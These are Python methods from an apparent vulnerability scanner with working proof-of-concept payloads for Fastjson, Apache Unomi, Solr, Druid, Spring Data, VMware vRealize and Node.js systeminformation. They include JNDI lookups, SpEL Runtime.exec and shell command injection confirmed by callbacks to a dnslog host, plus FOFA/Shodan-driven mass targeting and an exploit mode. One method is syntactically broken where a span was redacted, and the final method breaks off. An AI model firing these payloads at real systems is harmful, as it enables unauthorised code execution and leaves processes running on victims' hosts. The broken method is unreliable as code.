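def fastjson_1224_poc(self) -> None:
    """Probe for the Fastjson <= 1.2.24 autoType deserialization RCE (CVE-2017-18349).

    Posts a JSON document whose ``@type`` is ``com.sun.rowset.JdbcRowSetImpl``
    with ``dataSourceName`` set to an ``ldap://`` URL under a fresh dnslog
    domain.  A vulnerable parser performs the JNDI lookup, which resolves that
    domain; ``dns_result`` then reports the callback.  This scanner stands up
    no LDAP server, so detection rests on the DNS resolution alone and no
    class is served to the target.

    The result is recorded in ``self.vul_info`` and printed through ``verify``.
    ``self.threadLock`` is held for the whole method because ``self.vul_info``
    is shared between scanner threads.
    """
    # ``with`` releases the lock even when an exception escapes one of the
    # except handlers below (the original acquire()/release() pair did not).
    with self.threadLock:
        self.vul_info["prt_name"] = "Fastjson: 1.2.24"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
        self.vul_info["vul_numb"] = "CVE-2017-18349"
        self.vul_info["vul_apps"] = "Fastjson"
        self.vul_info["vul_date"] = "2017-03-15"
        self.vul_info["vul_vers"] = "<= 1.2.24"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码"
        self.vul_info["cre_date"] = "2021-01-20"
        self.vul_info["cre_auth"] = "zhzyker"
        headers = {
            'User-Agent': self.ua,
            'Content-Type': "application/json",
            'Connection': 'close',
        }
        dns = dns_request()
        ldap_url = "ldap://" + dns + "//Exploit"
        data = json.dumps({
            "b": {
                "@type": "com.sun.rowset.JdbcRowSetImpl",
                "dataSourceName": ldap_url,
                "autoCommit": True,
            }
        })
        try:
            try:
                request = requests.post(self.url, data=data, headers=headers,
                                        timeout=self.timeout, verify=False)
                self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
            except requests.exceptions.RequestException:
                # The target may hang or drop the connection while doing the
                # JNDI lookup; the DNS callback below still decides the result.
                pass
            if dns_result(dns):
                # Record the payload as sent (the original appended a stray "] ").
                self.vul_info["vul_payd"] = ldap_url
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[dns] [payload: " + ldap_url + "] "
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])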
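def fastjson(self, webapps_identify, url) -> None:
    """Fingerprint Fastjson behind ``url`` and append findings to ``webapps_identify``.

    Two signals are used, in order:

    1. A deliberately truncated body (``{"a":"``) is posted; if the error
       page mentions ``com.alibaba.fastjson.JSONException`` and the response
       is served as ``application/json``, ``"fastjson"`` is appended.
    2. Otherwise four autoType probe documents (``java.net.Inet4Address`` /
       ``java.net.URL``) are posted.  Each makes a Fastjson parser resolve a
       fresh dnslog domain; if ``dns_result`` sees the callback,
       ``"fastjson"`` and ``"fastjson [<domain>]"`` are appended.

    Identification is best-effort: any failure leaves ``webapps_identify``
    untouched rather than aborting the scan.
    """
    name = "Fastjson"
    Identify.identify_prt(name)
    dns = dns_request()
    probes = [
        '{"e":{"@type":"java.net.Inet4Address","val":"%s"}}' % dns,
        '{"@type":"java.net.Inet4Address","val":"%s"}' % dns,
        '{{"@type":"java.net.URL","val":"http://%s"}:"x"}' % dns,
        '{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"%s"}}""}' % dns,
    ]
    malformed = '{"a":"'
    headers = {'User-Agent': self.ua, 'Content-Type': "application/json", 'Connection': 'close'}
    try:
        try:
            request = requests.post(url, data=malformed, headers=headers,
                                    timeout=self.timeout, verify=False)
        except requests.exceptions.RequestException:
            # Original fell into a NameError on ``request`` that the outer
            # handler swallowed; give up explicitly instead.
            return
        if r"nested exception is com.alibaba.fastjson.JSONException:" in request.text:
            # ``==`` and ``in`` were two identical branches; a missing header
            # used to raise KeyError and abort silently -- treat it as no match.
            if r"application/json" in request.headers.get('Content-Type', ''):
                webapps_identify.append("fastjson")
        else:
            for probe in probes:
                try:
                    requests.post(url, data=probe, headers=headers,
                                  timeout=self.timeout, verify=False)
                except requests.exceptions.RequestException:
                    # One refused/timed-out probe should not stop the others.
                    continue
            if dns_result(dns):
                webapps_identify.append("fastjson")
                webapps_identify.append("fastjson [" + dns + "]")
    except Exception:
        # Best-effort fingerprinting: never let identification abort the scan.
        pass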
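def cve_2020_13942_poc(self) -> None:
    """Probe Apache Unomi for CVE-2020-13942 (MVEL/OGNL expression injection, < 1.5.2).

    Posts ``self.payload_cve_2020_13942`` (with ``RECOMMAND`` replaced by
    ``ping <dnslog-domain>``) to ``/context.json``.  A DNS callback is a
    confirmed hit; failing that, a ``pagePath`` of ``/tracker/`` in the
    returned ``trackedConditions`` is reported as a "maybe".

    Unlike the original, the payload and headers are locals: the original
    wrote ``self.payload`` / ``self.headers``, and ``self.headers`` is read by
    other PoCs on the same object, so a JSON content type leaked into their
    requests.  Note that ``ping`` without a count runs until killed on Linux,
    so a successful injection may leave a lingering process on the target.
    """
    with self.threadLock:
        self.vul_info["prt_name"] = "Apache Unomi: CVE-2020-13942"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = self.payload_cve_2020_13942.replace("RECOMMAND", "whoami")
        self.vul_info["vul_name"] = "Apache Unomi remote code execution"
        self.vul_info["vul_numb"] = "CVE-2020-13942"
        self.vul_info["vul_apps"] = "Unomi"
        self.vul_info["vul_date"] = "2020-11-23"
        self.vul_info["vul_vers"] = "< 1.5.2"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = (
            "攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码,"
            "漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞是对CVE-2020-11975漏洞的补丁绕过,"
            "攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。"
        )
        self.vul_info["cre_date"] = "2021-01-28"
        self.vul_info["cre_auth"] = "zhzyker"
        dns = dns_request()
        cmd = "ping " + dns
        payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd)
        headers = {
            'User-Agent': self.ua,
            'Accept': '*/*',
            'Connection': 'close',
            'Content-Type': 'application/json',
        }
        try:
            req = requests.post(self.url + "/context.json", data=payload, headers=headers,
                                timeout=self.timeout, verify=False)
            if dns_result(dns):
                self.vul_info["vul_data"] = dump.dump_all(req).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[dns] [cmd:" + cmd + "]"
            else:
                # Weak secondary signal; a non-JSON or differently shaped body
                # simply means "no evidence" rather than a scanner error.
                try:
                    rep = list(json.loads(req.text)["trackedConditions"])[0]["parameterValues"]["pagePath"]
                except (ValueError, KeyError, IndexError, TypeError):
                    rep = ""
                if r"/tracker/" in rep:
                    self.vul_info["vul_data"] = dump.dump_all(req).decode('utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoC_MaYbE"
                    self.vul_info["prt_info"] = "[maybe]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])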
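def cve_2021_27905_poc(self) -> None:
    """Probe Apache Solr for CVE-2021-27905 (ReplicationHandler ``masterUrl`` SSRF).

    Lists cores via ``/solr/admin/cores``, then asks the first core's
    ReplicationHandler to ``fetchindex`` from ``http://<dnslog-domain>/``.
    The DNS callback is the only evidence used; nothing is printed for a
    negative result (kept from the original, unlike the sibling PoCs).

    NOTE(review): the ``httpBasicAuthUser`` / ``httpBasicAuthPassword``
    values appear as ``******`` in the copy reviewed (redacted); the original
    literal is not recoverable here.  They are plain query parameters of the
    fetchindex request and do not take part in the check, so the placeholder
    is kept verbatim -- restore the project's value if it matters.
    """
    with self.threadLock:
        self.vul_info["prt_name"] = "Apache Solr: CVE-2021-27905"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "Apache Solr Replication handler SSRF"
        self.vul_info["vul_numb"] = "CVE-2021-27905"
        self.vul_info["vul_apps"] = "Solr"
        self.vul_info["vul_date"] = "2021-04-14"
        self.vul_info["vul_vers"] = "7.0.0-7.7.3, 8.0.0-8.8.1"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "SSRF"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。"
        self.vul_info["cre_auth"] = "zhzyker"
        dns = dns_request()
        url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
        try:
            request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False)
            core_name = None
            try:
                core_name = list(json.loads(request.text)["status"])[0]
            except (ValueError, KeyError, IndexError, TypeError):
                pass
            if core_name is None:
                # No core to aim the ReplicationHandler at.  The original hit a
                # TypeError in str.replace here and reported a generic error.
                return
            payload = ("/solr/re_core_name/replication?command=fetchindex&masterUrl"
                       "=http://re_dns_domain/&wt=json"
                       "&httpBasicAuthUser=******&httpBasicAuthPassword=******")
            payload = payload.replace("re_core_name", core_name).replace("re_dns_domain", dns)
            url_ssrf = urljoin(self.url, payload)
            r = requests.get(url_ssrf, headers=self.headers, timeout=self.timeout, verify=False)
            # Truthiness, as every sibling PoC does.  The original tested
            # ``dns in dns_result(dns)``, which raises TypeError if dns_result
            # returns a bool -- NOTE(review): confirm dns_result's return type.
            if dns_result(dns):
                self.vul_info["vul_payd"] = url_ssrf
                self.vul_info["vul_data"] = dump.dump_all(r).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[ssrf] [dns] [corename: " + self.url + "/solr/" + core_name + " ]"
                verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])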
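def fastjson_1262_poc(self) -> None:
    """Probe for the Fastjson <= 1.2.62 autoType bypass via ``JndiConverter``.

    Posts ``{"@type": "org.apache.xbean.propertyeditor.JndiConverter",
    "AsText": "ldap://<dnslog-domain>//exploit"}``.  A parser with autoType
    enabled performs the JNDI lookup and resolves the domain, which
    ``dns_result`` reports.  No LDAP server is stood up by this scanner, so
    nothing is served to the target; the DNS callback is the only signal.

    The recorded payload now matches what was actually sent (the original
    logged ``//Exploit] `` while sending ``//exploit``).
    """
    with self.threadLock:
        self.vul_info["prt_name"] = "Fastjson: 1.2.62"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
        self.vul_info["vul_numb"] = "null"
        self.vul_info["vul_apps"] = "Fastjson"
        self.vul_info["vul_date"] = "2019-10-07"
        self.vul_info["vul_vers"] = "<= 1.2.62"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = (
            "官方暂未发布针对此漏洞的修复版本,开启了autoType功能的受影响用户可通过关闭autoType来规避风险"
            "(autoType功能默认关闭),另建议将JDK升级到最新版本。"
        )
        self.vul_info["cre_date"] = "2021-01-21"
        self.vul_info["cre_auth"] = "zhzyker"
        headers = {'User-Agent': self.ua, 'Content-Type': "application/json"}
        dns = dns_request()
        ldap_url = "ldap://" + dns + "//exploit"
        data = json.dumps({
            "@type": "org.apache.xbean.propertyeditor.JndiConverter",
            "AsText": ldap_url,
        })
        try:
            try:
                request = requests.post(self.url, data=data, headers=headers,
                                        timeout=self.timeout, verify=False)
                self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
            except requests.exceptions.RequestException:
                # A dropped or hung connection is expected while the target
                # performs the lookup; the DNS callback still decides.
                pass
            if dns_result(dns):
                self.vul_info["vul_payd"] = ldap_url
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[dns] [payload: " + ldap_url + "] "
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])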
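def cve_2021_25646_poc(self) -> None:
    """Probe Apache Druid (< 0.20.1) for CVE-2021-25646 via ``/druid/indexer/v1/sampler``.

    Posts ``self.payload_cve_2021_25646`` with ``RECOMMAND`` replaced by
    ``ping <dnslog-domain>``; a DNS callback reported by ``dns_result`` is
    the only success criterion.  The description recorded below notes that
    the endpoint expects an authenticated user.  ``ping`` without a count does
    not terminate on Linux, so a hit can leave a process running on the target.
    """
    with self.threadLock:
        self.vul_info["prt_name"] = "Apache Druid: CVE-2021-25646"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "Apache Druid 远程代码执行漏洞"
        self.vul_info["vul_numb"] = "CVE-2021-25646"
        self.vul_info["vul_apps"] = "Druid"
        self.vul_info["vul_date"] = "2021-02-01"
        self.vul_info["vul_vers"] = "< 0.20.1"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行漏洞"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = (
            "Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。"
            "此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,"
            "经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。"
            "攻击者可直接构造恶意请求执行任意代码,控制服务器。"
        )
        self.vul_info["cre_date"] = "2021-02-03"
        self.vul_info["cre_auth"] = "zhzyker"
        url = urljoin(self.url, "/druid/indexer/v1/sampler")
        headers = {
            'Content-Type': 'application/json',
            'User-Agent': self.ua,
            'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
            'Connection': 'keep-alive',
        }
        dns = dns_request()
        cmd = "ping " + dns
        data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
        try:
            request = requests.post(url, data=data, headers=headers,
                                    timeout=self.timeout, verify=False)
            if dns_result(dns):
                self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                self.vul_info["vul_payd"] = data
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[dns] [rce] [cmd: " + cmd + "]"
                verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])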
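def cve_2021_21975_poc(self) -> None:
    """Probe VMware vRealize Operations Manager (<= 8.3.0) for the CVE-2021-21975 SSRF.

    Posts ``["<dnslog-domain>"]`` to ``/casa/nodes/thumbprints``; the server
    contacting that host (seen via ``dns_result``) confirms the SSRF.

    Fix: ``vul_numb`` now records CVE-2021-21975 -- the original wrote
    CVE-2021-21972 (the vCenter upload bug) while the name and title said
    21975, so reports carried the wrong identifier.
    """
    with self.threadLock:
        self.vul_info["prt_name"] = "VMware vRealize Operations Manager: CVE-2021-21975"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "VMware vRealize Operations Manager API SSRF"
        self.vul_info["vul_numb"] = "CVE-2021-21975"
        self.vul_info["vul_apps"] = "Vmware"
        self.vul_info["vul_date"] = "2021-03-31"
        self.vul_info["vul_vers"] = "<= 8.3.0"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "SSRF"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "攻击者通过访问vRealize Operations Manager API传递特定的参数到服务器端进行请求伪造攻击"
        self.vul_info["cre_date"] = "2021-04-01"
        self.vul_info["cre_auth"] = "zhzyker"
        headers = {
            "User-Agent": self.ua,
            "Content-Type": "application/json;charset=UTF-8",
        }
        dns = dns_request()
        data = '["' + dns + '"]'
        url = urljoin(self.url, "/casa/nodes/thumbprints")
        try:
            res = requests.post(url, data=data, headers=headers,
                                timeout=self.timeout, verify=False)
            if dns_result(dns):
                self.vul_info["vul_data"] = dump.dump_all(res).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = data
                self.vul_info["prt_info"] = "[ssrf] [dns:" + dns + " ]"
                verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])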
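def cve_2021_21315_poc(self) -> None:
    """Probe a Node.js ``systeminformation`` (< 5.3.1) service for CVE-2021-21315.

    Requests ``/api/getServices?name[]=$(ping%20<dnslog-domain>)``; the
    command substitution runs on a vulnerable host and the DNS callback seen
    by ``dns_result`` is the success signal.

    The request uses a fixed 3 second timeout rather than ``self.timeout``
    on purpose: ``ping`` without a count never exits on Linux, so the HTTP
    response only arrives when the request times out.  That also means a
    successful probe leaves a ``ping`` process running on the target.
    """
    with self.threadLock:
        self.vul_info["prt_name"] = "Node.JS: CVE-2021-21315"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "Node.JS Command Injection"
        self.vul_info["vul_numb"] = "CVE-2021-21315"
        self.vul_info["vul_apps"] = "Node.JS"
        self.vul_info["vul_date"] = "2021-02-25"
        self.vul_info["vul_vers"] = "Systeminformation < 5.3.1"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "Command Injection"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "CVE-2021-21315 Node.JS OS sanitize service Parameters Command Injection"
        self.vul_info["cre_date"] = "2021-03-04"
        self.vul_info["cre_auth"] = "zhzyker"
        headers = {
            "User-agent": self.ua,
            "Connection": "close",
        }
        dns = dns_request()
        cmd = "ping%20" + dns
        payload = "/api/getServices?name[]=$(RECOMMAND)".replace("RECOMMAND", cmd)
        url = self.url + payload
        try:
            try:
                req = requests.get(url, headers=headers, timeout=3, verify=False)
                raw = dump.dump_all(req).decode('utf-8', 'ignore')
            except requests.exceptions.RequestException:
                # Expected: the injected ping keeps the request open.
                raw = "null"
            if dns_result(dns):
                self.vul_info["vul_data"] = raw
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = payload
                self.vul_info["prt_info"] = "[dns] [payload:" + url + " ]"
                verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])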
def cve_2018_1273_poc(self) -> None:
    # NOTE(review): part of this method was redacted in the copy reviewed --
    # everything between the ``repeatedPassword=`` tail of the payload and the
    # ``.decode('utf-8', 'ignore')`` call is missing (the request headers, the
    # POST that delivers the SpEL payload, and the dns_result check).  The body
    # below is therefore not syntactically complete and is left as found;
    # the missing endpoint cannot be reconstructed from here without guessing.
    # Intent, from what is visible: record the CVE-2018-1273 metadata, build a
    # Spring Data Commons SpEL payload in the ``username[...]`` property path
    # that runs ``ping <dnslog-domain>``, and report PoCSuCCeSS when the DNS
    # callback is observed.  ``ping`` without a count does not terminate on
    # Linux, so a hit can leave a process running on the target.
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Spring Data: CVE-2018-1273"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Spring Data Commons 远程命令执行漏洞"
    self.vul_info["vul_numb"] = "CVE-2018-1273"
    self.vul_info["vul_apps"] = "Spring"
    self.vul_info["vul_date"] = "2018-04-11"
    self.vul_info["vul_vers"] = "1.13 - 1.13.10, 2.0 - 2.0.5"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程命令执行漏洞"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Spring Data Commons组件中存在远程代码执行漏洞," \
                                "攻击者可构造包含有恶意代码的SPEL表达式实现远程代码攻击,直接获取服务器控制权限。"
    self.vul_info["cre_date"] = "2021-01-26"
    self.vul_info["cre_auth"] = "zhzyker"
    md = dns_request()
    cmd = "ping " + md
    # Redacted span follows on this line ("******" is the redaction marker, not code).
    payload = 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("' + cmd + '")]=&password=&repeatedPassword='******'utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["vul_payd"] = payload
            self.vul_info["prt_info"] = "[dns] [rce] [payload: " + payload + " ]"
            verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
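def _mask_secret(value) -> str:
    """Return ``value`` with everything past its first four characters starred out.

    Keeps API keys out of the console (and therefore out of scrollback, CI
    logs and screen recordings) while still letting the user recognise which
    key is configured.
    """
    text = "" if value is None else str(value)
    return text[:4] + "*" * max(len(text) - 4, 0)


def _abort_if_exists(path, label, delay) -> None:
    """Exit if the ``-o-*`` output file ``path`` already exists.

    ``label`` names the format in the message ("text" / "json"); the original
    said "json" for both.  Exit status 0 is kept from the original, so a
    wrapper script cannot distinguish this failure from success -- TODO:
    consider a non-zero status.
    """
    if path and os.path.isfile(path):
        print(now.timed(de=delay) + color.red_warn() +
              color.red(" The " + label + " file: [" + path + "] already exists"))
        exit(0)


def _scan_url(args) -> None:
    """PoC-scan the single target given with ``-u`` (exits if it is not alive)."""
    args.url = url_check(args.url)
    if survival_check(args.url) == "f":
        print(now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + args.url))
        exit(0)
    print(now.timed(de=0) + color.yel_info() + color.cyan(" Start scanning target: " + args.url))
    if args.app is None:
        # No -a: every webapp PoC runs against this one URL.
        globals.set_value("RUNALLPOC", True)
    core.control_webapps("url", args.url, args.app, "poc")


def _scan_file(args) -> None:
    """PoC-scan every target listed in the ``-f`` file (exits if it is missing)."""
    if not os.path.isfile(args.file):
        print(now.timed(de=0) + color.red_warn() + color.red(" Not found target file: " + args.file))
        exit(0)
    print(now.timed(de=0) + color.yel_info() + color.cyan(" Start batch scanning target: " + args.file))
    if args.app is None:
        globals.set_value("RUNALLPOC", "FILE")
    core.control_webapps("file", args.file, args.app, "poc")


def _scan_fofa(args) -> None:
    """Pull targets from the FOFA API for ``args.fofa`` and PoC-scan them.

    Refuses to run while the configured key still holds the ``xxxxxx``
    placeholder.  The key itself is printed masked.
    """
    print(now.timed(de=0) + color.yel_info() +
          color.yellow(" Use fofa api to search [" + args.fofa + "] and start scanning"))
    if r"xxxxxx" in globals.get_value("fofa_key"):
        print(now.timed(de=0) + color.red_warn() + color.red(" Check fofa email is xxxxxx Please replace key and email"))
        print(now.timed(de=0) + color.red_warn() + color.red(" Go to https://fofa.so/user/users/info find key and email"))
        print(now.timed(de=0) + color.red_warn() + color.red(" How to use key and email reference https://github.com/zhzyker/vulmap"))
        exit(0)
    print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa email: " + globals.get_value("fofa_email")))
    print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa key: " + _mask_secret(globals.get_value("fofa_key"))))
    fofa_list = fofa(args.fofa, args.size)
    core.control_webapps("fofa", fofa_list, args.app, "poc")


def _scan_shodan(args) -> None:
    """Pull targets from the Shodan API for ``args.shodan`` and PoC-scan them.

    Refuses to run while the configured key still holds the ``xxxxxx``
    placeholder.  The key itself is printed masked.
    """
    print(now.timed(de=0) + color.yel_info() +
          color.yellow(" Use shodan api to search [" + args.shodan + "] and start scanning"))
    if r"xxxxxx" in globals.get_value("shodan_key"):
        print(now.timed(de=0) + color.red_warn() + color.red(" Check shodan key is xxxxxx Please replace key"))
        print(now.timed(de=0) + color.red_warn() + color.red(" Go to https://account.shodan.io/ find key"))
        print(now.timed(de=0) + color.red_warn() + color.red(" How to use key reference https://github.com/zhzyker/vulmap"))
        exit(0)
    print(now.timed(de=0) + color.yel_info() + color.yellow(" Shodan key: " + _mask_secret(globals.get_value("shodan_key"))))
    shodan_list = shodan_api(args.shodan)
    core.control_webapps("shodan", shodan_list, args.app, "poc")


def control_options(args) -> None:
    """Dispatch the parsed command line: proxies, flags, then poc or exp mode.

    Order of operations (unchanged from the original):

    1. proxy setup (``--socks`` wins over ``--http``), ``--list``, thread
       count notice, ``-v`` forcing ``exp`` mode, ``--debug``;
    2. dnslog initialisation (a warning only -- scanning continues even though
       every DNS-callback based PoC will then be blind);
    3. refuse to overwrite existing ``-o-text`` / ``-o-json`` files;
    4. ``poc`` mode: exactly one of ``-u``, ``-f``, ``--fofa``, ``--shodan``;
       ``exp`` mode: ``-v`` together with ``-u``.

    Error paths call ``exit(0)`` as the original did.  The ``args.list is
    False`` / ``args.debug is False`` tests are kept verbatim; presumably
    those flags are declared with ``store_false`` -- confirm against the
    argparse setup before "fixing" them.
    """
    delay = globals.get_value("DELAY")
    now_warn = now.timed(de=delay) + color.red_warn()
    if args.socks:
        proxy_set(args.socks, "socks")
    elif args.http:
        proxy_set(args.http, "http")
    if args.list is False:
        print(now.timed(de=0) + color.yel_info() + color.yellow(" List of supported vulnerabilities"))
        print(vul_list())
    if args.thread_num != 10:
        print(now.timed(de=0) + color.yel_info() + color.yellow(" Custom thread number: " + str(args.thread_num)))
    if args.vul is not None:
        args.mode = "exp"
    if args.debug is False:
        print(now.timed(de=delay) + color.yel_info() + color.yellow(" Using debug mode to echo debug information"))
        globals.set_value("DEBUG", "debug")
    if not dns_request():
        print(now_warn + color.red(" Dnslog platform (hyuga.co dnslog.cn ceye.io) is not available"))
    _abort_if_exists(args.O_TEXT, "text", delay)
    _abort_if_exists(args.O_JSON, "json", delay)
    if args.mode is None or args.mode == "poc":
        if args.url is not None and args.file is None:
            _scan_url(args)
        elif args.file is not None and args.url is None:
            _scan_file(args)
        elif args.url is None and args.file is None and args.fofa is not None:
            _scan_fofa(args)
        elif args.url is None and args.file is None and args.shodan is not None:
            _scan_shodan(args)
        if args.O_TEXT:
            print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result text saved to: " + args.O_TEXT))
        if args.O_JSON:
            print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result json saved to: " + args.O_JSON))
    elif args.mode == "exp":
        if args.vul is not None and args.url is not None:
            core.control_webapps("url", args.url, args.vul, "exp")
        else:
            print(now_warn + color.red(" Options error, -v must specify -u"))
    else:
        print(now_warn + color.red(" Options error ... ..."))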
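def cve_2017_12629_poc(self) -> None:
    """Probe Apache Solr (< 7.1.0) for CVE-2017-12629 via the Config API.

    Lists cores, then POSTs ``self.payload_cve_2017_12629`` (``RECOMMAND``
    -> ``ping <dnslog-domain>``, ``new_core`` -> a random name) to
    ``/solr/<core>/config``.  A DNS callback is a confirmed hit; otherwise a
    200 from the core listing plus a discovered core is reported as "maybe".

    Caveats a practitioner should know:

    * The first statement rewrites ``http.client.HTTPConnection._http_vsn_str``
      for the whole process and never restores it, so every later request
      from this scanner (other PoCs included) is sent as HTTP/1.0.  It is
      kept because the original relied on it -- presumably so the body is
      not sent chunked; confirm before removing.
    * Per the recorded description the payload registers a listener
      (RunExecutableListener) through the Config API; nothing here reverts
      that change on the target, and ``ping`` without a count does not
      terminate on Linux.

    Unused ``payload2`` / ``headers_solr2`` from the original were dropped.
    """
    with self.threadLock:
        http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
        self.vul_info["prt_name"] = "Apache Solr: CVE-2017-12629"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_payd"] = self.payload_cve_2017_12629.replace("RECOMMAND", "whoami")
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_name"] = "Apache Solr 远程代码执行漏洞"
        self.vul_info["vul_numb"] = "CVE-2017-12629"
        self.vul_info["vul_apps"] = "Solr"
        self.vul_info["vul_date"] = "2017-10-14"
        self.vul_info["vul_vers"] = "< 7.1.0"
        self.vul_info["vul_risk"] = "high"
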